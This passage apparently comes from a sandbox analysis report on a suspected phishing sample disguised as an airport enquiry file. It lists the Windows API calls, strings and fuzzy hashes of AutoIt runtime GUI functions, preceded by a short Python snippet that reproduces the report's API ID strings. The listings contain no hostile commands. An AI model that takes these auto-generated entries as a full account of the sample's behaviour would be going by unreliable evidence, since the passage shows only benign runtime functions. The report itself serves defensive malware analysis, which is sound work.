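    "GlobalFree", "CreateStreamOnHGlobal", "OleLoadPicture", "GlobalFree",
    "CopyImage", "SendMessageW", "SetWindowPos", "ShowWindow",
]

# Transcribed from the control-teardown function above (ref 00C82CA2 .. 00CBCB62),
# including the InvalidateRect reached through the subcall at 00C81B41.
TEARDOWN_CALLS = [
    "DestroyWindow", "DeleteObject", "DeleteObject", "DestroyIcon", "DestroyWindow",
    "SendMessageW", "ImageList_Remove", "MoveWindow", "InvalidateRect",
    "SendMessageW", "SendMessageW", "ImageList_Destroy", "ImageList_Destroy",
]

if __name__ == "__main__":
    print(api_id(SPLASH_IMAGE_CALLS))
    print(api_id(TEARDOWN_CALLS))
    print(string_id(["AutoIt v3", "DISPLAY", "msctls_progress32", "static"]))
    print(round(jaccard(SPLASH_IMAGE_CALLS, TEARDOWN_CALLS), 3))
```

Running it prints exactly the API ID strings shown for those two functions above, which is the check that the inferred rule is right; a mismatch on a new listing would mean the plugin applies a rule this page does not reveal. The Jaccard score is only a convenience for ranking candidate matches and is not something the report computes.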
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __wcsnicmp
            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
            • API String ID: 1038674560-86951937
            • Opcode ID: 74a2c353454121a6d88d37af435e821d23d115aeb5e13e8aae64bf2873dcfcde
            • Instruction ID: d7a3ed16522e3c4add2e7f992a07c490d1c5fcdcdae0668a4d35a0d7bdca9f34
            • Opcode Fuzzy Hash: 74a2c353454121a6d88d37af435e821d23d115aeb5e13e8aae64bf2873dcfcde
            • Instruction Fuzzy Hash: 8D811471600256BBCB24BB60CC92FFB7768AF12708F144024F945AA1C2EB65DF55F3A9
            APIs
            • GetSysColor.USER32(00000012), ref: 00D0AB99
            • SetTextColor.GDI32(?,?), ref: 00D0AB9D
            • GetSysColorBrush.USER32(0000000F), ref: 00D0ABB3
            • GetSysColor.USER32(0000000F), ref: 00D0ABBE
            • CreateSolidBrush.GDI32(?), ref: 00D0ABC3
            • GetSysColor.USER32(00000011), ref: 00D0ABDB
            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00D0ABE9
            • SelectObject.GDI32(?,00000000), ref: 00D0ABFA
            • SetBkColor.GDI32(?,00000000), ref: 00D0AC03
            • SelectObject.GDI32(?,?), ref: 00D0AC10
            • InflateRect.USER32(?,000000FF,000000FF), ref: 00D0AC2F
            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00D0AC46
            • GetWindowLongW.USER32(00000000,000000F0), ref: 00D0AC5B
            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00D0ACA7
            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00D0ACCE
            • InflateRect.USER32(?,000000FD,000000FD), ref: 00D0ACEC
            • DrawFocusRect.USER32(?,?), ref: 00D0ACF7
            • GetSysColor.USER32(00000011), ref: 00D0AD05
            • SetTextColor.GDI32(?,00000000), ref: 00D0AD0D
            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00D0AD21
            • SelectObject.GDI32(?,00D0A869), ref: 00D0AD38
            • DeleteObject.GDI32(?), ref: 00D0AD43
            • SelectObject.GDI32(?,?), ref: 00D0AD49
            • DeleteObject.GDI32(?), ref: 00D0AD4E
            • SetTextColor.GDI32(?,?), ref: 00D0AD54
            • SetBkColor.GDI32(?,?), ref: 00D0AD5E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
            • String ID:
            • API String ID: 1996641542-0
            • Opcode ID: 2099cbad8c6342c3a250e277f25e327a8806d649bf0a760c156e64142236f9f9
            • Instruction ID: 941848dd962d48d7511ed3cff606dc34dc11d6d5e0ab1a40b6851b134bec81ec
            • Opcode Fuzzy Hash: 2099cbad8c6342c3a250e277f25e327a8806d649bf0a760c156e64142236f9f9
            • Instruction Fuzzy Hash: 3E614D71900318EFDB219FA8DC48FAE7B79EB08320F254525F919EB2E1D6759D40DBA0
            APIs
            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00D08D34
            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D08D45
            • CharNextW.USER32(0000014E), ref: 00D08D74
            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00D08DB5
            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00D08DCB
            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D08DDC
            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00D08DF9
            • SetWindowTextW.USER32(?,0000014E), ref: 00D08E45
            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00D08E5B
            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D08E8C
            • _memset.LIBCMT ref: 00D08EB1
            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00D08EFA
            • _memset.LIBCMT ref: 00D08F59
            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00D08F83
            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00D08FDB
            • SendMessageW.USER32(?,0000133D,?,?), ref: 00D09088
            • InvalidateRect.USER32(?,00000000,00000001), ref: 00D090AA
            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00D090F4
            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00D09121
            • DrawMenuBar.USER32(?), ref: 00D09130
            • SetWindowTextW.USER32(?,0000014E), ref: 00D09158
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
            • String ID: 0
            • API String ID: 1073566785-4108050209
            • Opcode ID: 3e8bb2aab5c9eeac1c4e866076bb66f5f4f27035a36b2861e94d7130b3f51d65
            • Instruction ID: e7541bee513940f7b8fc08510e40513e1d64846bdfa1c5d48ef87374e7f1178d
            • Opcode Fuzzy Hash: 3e8bb2aab5c9eeac1c4e866076bb66f5f4f27035a36b2861e94d7130b3f51d65
            • Instruction Fuzzy Hash: 74E17E70900219AFDB209F64CC88BEEBBB9EF05714F148155F959AA2D1DB708A81EF71
            APIs
            • GetCursorPos.USER32(?), ref: 00D04C51
            • GetDesktopWindow.USER32 ref: 00D04C66
            • GetWindowRect.USER32(00000000), ref: 00D04C6D
            • GetWindowLongW.USER32(?,000000F0), ref: 00D04CCF
            • DestroyWindow.USER32(?), ref: 00D04CFB
            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00D04D24
            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D04D42
            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00D04D68
            • SendMessageW.USER32(?,00000421,?,?), ref: 00D04D7D
            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00D04D90
            • IsWindowVisible.USER32(?), ref: 00D04DB0
            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00D04DCB
            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00D04DDF
            • GetWindowRect.USER32(?,?), ref: 00D04DF7
            • MonitorFromPoint.USER32(?,?,00000002), ref: 00D04E1D
            • GetMonitorInfoW.USER32(00000000,?), ref: 00D04E37
            • CopyRect.USER32(?,?), ref: 00D04E4E
            • SendMessageW.USER32(?,00000412,00000000), ref: 00D04EB9
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
            • String ID: ($0$tooltips_class32
            • API String ID: 698492251-4156429822
            • Opcode ID: 58edac6ef28f288ec6d87ce611b4163c7b99897bda080bf4227cb92aeef64908
            • Instruction ID: 7fe929c6c9bf5c16660cafc3db72caa896bd64b9a86f1d004035b5b756544561
            • Opcode Fuzzy Hash: 58edac6ef28f288ec6d87ce611b4163c7b99897bda080bf4227cb92aeef64908
            • Instruction Fuzzy Hash: 9FB158B1604340AFDB14DF64C848B6ABBE4FF88714F04891DF69D9B2A1DB71E805CBA5
            APIs
            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C828BC
            • GetSystemMetrics.USER32(00000007), ref: 00C828C4
            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C828EF
            • GetSystemMetrics.USER32(00000008), ref: 00C828F7
            • GetSystemMetrics.USER32(00000004), ref: 00C8291C
            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C82939
            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C82949
            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C8297C
            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C82990
            • GetClientRect.USER32(00000000,000000FF), ref: 00C829AE
            • GetStockObject.GDI32(00000011), ref: 00C829CA
            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C829D5
              • Part of subcall function 00C82344: GetCursorPos.USER32(?), ref: 00C82357
              • Part of subcall function 00C82344: ScreenToClient.USER32(00D467B0,?), ref: 00C82374
              • Part of subcall function 00C82344: GetAsyncKeyState.USER32(00000001), ref: 00C82399
              • Part of subcall function 00C82344: GetAsyncKeyState.USER32(00000002), ref: 00C823A7
            • SetTimer.USER32(00000000,00000000,00000028,00C81256), ref: 00C829FC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
            • String ID: AutoIt v3 GUI
            • API String ID: 1458621304-248962490
            • Opcode ID: cd8349fed01b7276c325a39e2bb2e3174cf87ce4a663f3dd0842fee2f7d61168
            • Instruction ID: 95a03239a8af221bcfc5df7a4e2381b9ce906c1514774e739d73fc369de118a8
            • Opcode Fuzzy Hash: cd8349fed01b7276c325a39e2bb2e3174cf87ce4a663f3dd0842fee2f7d61168
            • Instruction Fuzzy Hash: D4B15D7560020A9FDB14EFA8DC89BEE7BA4FB08714F104129FA16E72E0DB74D941CB65
            APIs
            • CharUpperBuffW.USER32(?,?), ref: 00D040F6
            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00D041B6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BuffCharMessageSendUpper
            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
            • API String ID: 3974292440-719923060
            • Opcode ID: 2d00b0fb9941601b2f7357cc1a5593e137fc734bcf08d26f72a75cc2896e8e7f
            • Instruction ID: 34861d242ca97dcd726f424039113b22a89335e6a6b00125be33bfa8a58e32e9
            • Opcode Fuzzy Hash: 2d00b0fb9941601b2f7357cc1a5593e137fc734bcf08d26f72a75cc2896e8e7f
            • Instruction Fuzzy Hash: 2FA18EB02143019BCB14EF20C991F7AB3A5EF85318F18496DB99A9B3D2DB30EC05DB65
            APIs
            • LoadCursorW.USER32(00000000,00007F89), ref: 00CF5309
            • LoadCursorW.USER32(00000000,00007F8A), ref: 00CF5314
            • LoadCursorW.USER32(00000000,00007F00), ref: 00CF531F
            • LoadCursorW.USER32(00000000,00007F03), ref: 00CF532A
            • LoadCursorW.USER32(00000000,00007F8B), ref: 00CF5335
            • LoadCursorW.USER32(00000000,00007F01), ref: 00CF5340
            • LoadCursorW.USER32(00000000,00007F81), ref: 00CF534B
            • LoadCursorW.USER32(00000000,00007F88), ref: 00CF5356
            • LoadCursorW.USER32(00000000,00007F80), ref: 00CF5361
            • LoadCursorW.USER32(00000000,00007F86), ref: 00CF536C
            • LoadCursorW.USER32(00000000,00007F83), ref: 00CF5377
            • LoadCursorW.USER32(00000000,00007F85), ref: 00CF5382
            • LoadCursorW.USER32(00000000,00007F82), ref: 00CF538D
            • LoadCursorW.USER32(00000000,00007F84), ref: 00CF5398
            • LoadCursorW.USER32(00000000,00007F04), ref: 00CF53A3
            • LoadCursorW.USER32(00000000,00007F02), ref: 00CF53AE
            • GetCursorInfo.USER32(?), ref: 00CF53BE
            • GetLastError.KERNEL32(00000001,00000000), ref: 00CF53E9
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Cursor$Load$ErrorInfoLast
            • String ID:
            • API String ID: 3215588206-0
            • Opcode ID: c738e193a047bbe9ab78bdb84d3f80d8dcff68d043658a7e861f465aef68cc16
            • Instruction ID: b25b3549bcfd767511b9c88e9966ca4e7e8681e1a79ae7c636296a2e0297d046
            • Opcode Fuzzy Hash: c738e193a047bbe9ab78bdb84d3f80d8dcff68d043658a7e861f465aef68cc16
            • Instruction Fuzzy Hash: FF418670E043196ADB509FBA8C4996FFFF8EF51B10B10452FE619E7290DAB8A501CE61
            APIs
            • GetClassNameW.USER32(?,?,00000100), ref: 00CDAAA5
            • __swprintf.LIBCMT ref: 00CDAB46
            • _wcscmp.LIBCMT ref: 00CDAB59
            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00CDABAE
            • _wcscmp.LIBCMT ref: 00CDABEA
            • GetClassNameW.USER32(?,?,00000400), ref: 00CDAC21
            • GetDlgCtrlID.USER32(?), ref: 00CDAC73
            • GetWindowRect.USER32(?,?), ref: 00CDACA9
            • GetParent.USER32(?), ref: 00CDACC7
            • ScreenToClient.USER32(00000000), ref: 00CDACCE
            • GetClassNameW.USER32(?,?,00000100), ref: 00CDAD48
            • _wcscmp.LIBCMT ref: 00CDAD5C
            • GetWindowTextW.USER32(?,?,00000400), ref: 00CDAD82
            • _wcscmp.LIBCMT ref: 00CDAD96
              • Part of subcall function 00CA386C: _iswctype.LIBCMT ref: 00CA3874
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
            • String ID: %s%u
            • API String ID: 3744389584-679674701
            • Opcode ID: 5c55aff145886df31474776950232e4e55d519dfeaa614947954cb9891935d7b
            • Instruction ID: da888eb540ac3e589e671e66e8fe832b2bca8d5add17e25475d6c00540257d9a
            • Opcode Fuzzy Hash: 5c55aff145886df31474776950232e4e55d519dfeaa614947954cb9891935d7b
            • Instruction Fuzzy Hash: 39A1F571204706AFDB14DF20C884FAAF7E9FF44315F10462AFAA9C2690D730EA55DB92
            APIs
            • GetClassNameW.USER32(00000008,?,00000400), ref: 00CDB3DB
            • _wcscmp.LIBCMT ref: 00CDB3EC
            • GetWindowTextW.USER32(00000001,?,00000400), ref: 00CDB414
            • CharUpperBuffW.USER32(?,00000000), ref: 00CDB431
            • _wcscmp.LIBCMT ref: 00CDB44F
            • _wcsstr.LIBCMT ref: 00CDB460
            • GetClassNameW.USER32(00000018,?,00000400), ref: 00CDB498
            • _wcscmp.LIBCMT ref: 00CDB4A8
            • GetWindowTextW.USER32(00000002,?,00000400), ref: 00CDB4CF
            • GetClassNameW.USER32(00000018,?,00000400), ref: 00CDB518
            • _wcscmp.LIBCMT ref: 00CDB528
            • GetClassNameW.USER32(00000010,?,00000400), ref: 00CDB550
            • GetWindowRect.USER32(00000004,?), ref: 00CDB5B9
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
            • String ID: @$ThumbnailClass
            • API String ID: 1788623398-1539354611
            • Opcode ID: cf64751e5def39c46b24a1f9836f673b823fbf8c60727445f45d9523f6a8950b
            • Instruction ID: 58be0c2267ec4694483526f34674648ec9b88d5347914b80b5d7c110fcc30f6b
            • Opcode Fuzzy Hash: cf64751e5def39c46b24a1f9836f673b823fbf8c60727445f45d9523f6a8950b
            • Instruction Fuzzy Hash: 4F81B171008306DBDB14DF10D885FAAB7E8EF44714F14856AFE998A292EB30DE46DB61
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __wcsnicmp
            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
            • API String ID: 1038674560-1810252412
            • Opcode ID: af80fb2d4e996f1cdcf958410144874e35b31c8781965f57e00c3516ed44f7fa
            • Instruction ID: c364ea1b8c47672262473defe7c6ea2820a20dbed2a52e4524a74a2376ca203a
            • Opcode Fuzzy Hash: af80fb2d4e996f1cdcf958410144874e35b31c8781965f57e00c3516ed44f7fa
            • Instruction Fuzzy Hash: 2B310932904305EADB14FA61CDA3EEEB7B49F10754F60012AF551711D2FFA1AF08E665
            APIs
            • LoadIconW.USER32(00000063), ref: 00CDC4D4
            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00CDC4E6
            • SetWindowTextW.USER32(?,?), ref: 00CDC4FD
            • GetDlgItem.USER32(?,000003EA), ref: 00CDC512
            • SetWindowTextW.USER32(00000000,?), ref: 00CDC518
            • GetDlgItem.USER32(?,000003E9), ref: 00CDC528
            • SetWindowTextW.USER32(00000000,?), ref: 00CDC52E
            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00CDC54F
            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00CDC569
            • GetWindowRect.USER32(?,?), ref: 00CDC572
            • SetWindowTextW.USER32(?,?), ref: 00CDC5DD
            • GetDesktopWindow.USER32 ref: 00CDC5E3
            • GetWindowRect.USER32(00000000), ref: 00CDC5EA
            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00CDC636
            • GetClientRect.USER32(?,?), ref: 00CDC643
            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00CDC668
            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00CDC693
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
            • String ID:
            • API String ID: 3869813825-0
            • Opcode ID: 8968b6f498d12b7195a65e4297b20077bc5f590d4745ffd6ce8ec38d9f1dd62b
            • Instruction ID: e6fba0d6fb25be89c8f4db6c3796876b58ce75f673d614b40d1611e26a92042b
            • Opcode Fuzzy Hash: 8968b6f498d12b7195a65e4297b20077bc5f590d4745ffd6ce8ec38d9f1dd62b
            • Instruction Fuzzy Hash: 67519D3090070AAFDB20DFA8DD85B6EBBF5FF04704F100929E696A26A0D771E905DB50
            APIs
            • _memset.LIBCMT ref: 00D0A4C8
            • DestroyWindow.USER32(00000000,?), ref: 00D0A542
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00D0A5BC
            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00D0A5DE
            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D0A5F1
            • DestroyWindow.USER32(00000000), ref: 00D0A613
            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C80000,00000000), ref: 00D0A64A
            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D0A663
            • GetDesktopWindow.USER32 ref: 00D0A67C
            • GetWindowRect.USER32(00000000), ref: 00D0A683
            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00D0A69B
            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00D0A6B3
              • Part of subcall function 00C825DB: GetWindowLongW.USER32(?,000000EB), ref: 00C825EC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
            • String ID: 0$tooltips_class32
            • API String ID: 1297703922-3619404913
            • Opcode ID: 7476f88e5ff743ba57ffbe910a254aadaa4ebefd2ad0bd7f427426b78cd1006d
            • Instruction ID: b8df284caab1e5f272f27aab0604a2c5a861ab79efe77909a3ac9a7ddc3d8ff1
            • Opcode Fuzzy Hash: 7476f88e5ff743ba57ffbe910a254aadaa4ebefd2ad0bd7f427426b78cd1006d
            • Instruction Fuzzy Hash: 2F718870140705AFD720DF28CC49F6A7BF5EB89304F98492DF989872A1D772E942CB26
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
            • DragQueryPoint.SHELL32(?,?), ref: 00D0C917
              • Part of subcall function 00D0ADF1: ClientToScreen.USER32(?,?), ref: 00D0AE1A
              • Part of subcall function 00D0ADF1: GetWindowRect.USER32(?,?), ref: 00D0AE90
